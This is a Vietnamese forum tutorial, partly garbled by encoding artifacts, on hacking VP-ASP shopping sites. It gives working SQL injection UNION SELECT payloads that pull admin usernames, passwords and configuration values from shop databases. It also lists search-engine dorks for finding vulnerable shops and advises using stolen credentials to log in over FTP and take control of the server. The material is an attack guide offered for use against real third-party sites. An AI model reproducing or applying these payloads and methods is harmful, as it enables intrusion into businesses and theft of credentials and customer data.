http://www.vietexpert.name/forum/redirector.ve?url=%68%=4%74%70%3a%2f%2f%68%74%74%70%78%78%78%78%2e%74%72%65%61%73%75%72%65%73%6=%69%64%64%65%6e%2e%63%6f%6d%2f%2e%2e%2e%2f%73%68%6f%70%61%64%6d%69%6e%2e=61%73%70

http://www.vietexpert.name/forum/redirector.ve?url=%68%=4%74%70%3a%2f%2f%78%78%78%78%78%2e%74%72%65%61%73%75%72%65%73%68%69%64%6=%65%6e%2e%63%6f%6d%2f%73%68%6f%2e%2e%2e%73%68%6f%70%61%64%6d%69%6e%31%2e=61%73%70

Nếu link admin ko phải như vậy, thi bạn =ùng câu lệnh sau :

Code:

union select =,2,fieldvalue,,4,5,6,7,8,9,10,11,12,13,14,15,16,1 =,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from =onfiguration"having 1=1--sp_passwordfieldvalue và configuration là gì thì bạn =iểu rồi không nói nữa. Câu =ệnh này sẽ cho ra rất nhiều kết =uả

bạn cứ view hết từng =rang (thường có 10 trang ) thu thập các link có đuôi .asp =ồi thay vào thử xem có phải link =dmin =o

-------------<%>-------------<%>-----------------------=------------------

shopdisplayproducts.asp?id=1'lỗi ok! chúng ta thường sài một =âu truy vấn để lấy thông tin:

CODE%20union%20select%201%20from%20"table"%27

"union =elect 1 from "table"'

theo kinh nghiệm tôi rút ra =C4?ược một điều. đó =à chúng ta có thễ dựa vào số linemà =C4?oán số column

CODE

line191 -- 56line184 -- 47,43,53line188 -- 53,56line191 -- 48line185 -- 86,43line202 -- 84,91line208 -- 48,57line64 -- 53line211,187 -- 43line59 -- 70........

sơ bộ vậy thôi.......( =ác pác cũng có thể xài tool wis and wed của dora để hack....nhưng mình =hì kông sài tool để hack mời =ác bạn tiếp)

chúng ta phải thêm =C4?úng số column thì mới lấy =hông tin được......trong trường hợp =húng ta thêm số hoài mà không =hấy cái bảng nào ra cả.....vậy phải làm sao =C4?ây.....

uh. vậy là nó đã =ix!bó tay sao.......không

Cách 1:các bạn đang =E1?? file shopdisplayproducts.aspbây giờ chuyển sang =ileshoptellafriend.aspshopexd.asp.......ok!tiếp tụcvd:shoptellafriend.aspline cũa nó là: =84 --> sô 47tiếp tục hack

CODE

Code:

shoptellafriend.asp?id=1%20union%20select% =01,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19, =0,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36 =37,38,39,40,41,42,43,44,45,46,47%20from%20tbluser =27nó ra một cái bảncó số =hehe!lấy user vào pass nào

CODE

Code:

shoptellafriend.asp?id=1%20union%20select%201,2,fl =username%2b'/'% 2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,17, =8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 =35,36,37,38,39,40,41,42,43,44,45,46,47%20from%20t =luser%27song xuôi, lấy link login nào.

CODE

Code:

shoptellafriend.asp?id=1%20union%20select%201, 2,fi =ldname%2b'/'% 2bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 =,19,20,21,22,23,24,25,26,27,2

8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, =5,46,47%20from%20configuration%27oach! sao chả thấy gì hết =ậy..........hixhix....khó rồi =C4?ây........bó tay sao.

bầy giờ chúng ta so sánh =hé.nếu ở file shopdisplayproducts.asp thì =ó sẽ đưa ra kết quả cho chúng =a...ở ngay hàng đâu tiên thì =ị bỏ trống.và thông tin xuất hiện ở hàng =hứ 2vậy cái mà chúng ta vừa =ấy được là cái hàng đầu tiên (hơi khó =iểu phải không)vậy chúng ta =hỉ cần đưa cái link login về hàng 1 bằng cách thay =ố 1 bằng

CODEfieldname='xadminpage'

------>

Code:

shoptellafriend.asp?id=1 =nion select fieldname='xadminpage',2,fieldname%2b'/'% =bfieldvalue,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 =,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, =5,36,37,38,39,40,41,42,43,44,45,46,47 from =onfiguration'ở file shopexd.asp cũng như =ậy....

----------------------<%>---------------<%>=-----------------------

Một số kinh nghiệm về hack shop :

_ Khi =ấy được user/pass của =C4?iều hành cần dùng nó để đăng =hập server với giao thức ftp nếu "may =ắn" (<----lão hackerjp nói thế ()) bạn =ó thể làm chủ server và không =ần phải phí công nhiều trong khi hack.

_ =ó một số trường hợp, site =ị lỗi Injectjon nhưng hiện trang báo lỗi (khi =a thêm dấu '): The page cannot bedisplayed, bạn cần chú ý phía =ên dưới nó vẫn báo lỗi =C4?ấy._ Khi hack shop bạn nên xoay nó theo nhiều =hiều : thay id bằng cat , để nguyên =ấu ' hoặc xoá nó đi khi ta =uery.........

_Khi search shop bạn cần cố =ắng tìm cách search sao cho thật hiệu =uả , một số từ khoá khác =à bạn cũng nên thử : VP ASP shopping

shop products

intext =asp?id="

intext .asp?id="

và còn nhiều nữa =ạn tự tìm hiểu thêm.

_ Tut =ày chỉ giúp bạn hack được những shop 1 pass = tuy là 1 pass nhưng còn hàng triệu shop như vậy ) (cố gắng mà =earch)

_ Với những shop 2 pass , thực =ự nếu bạn hiểu rõ những gì tôi nói =E1?? trên , thì việc hack pass 2 ko =hó...chúc may mắn ()

Trên là tut hack asp cơ =ản, trong lúc hack shop sẽ có những lúc không như mong muốn =ì vậy cần tư duy 1 chút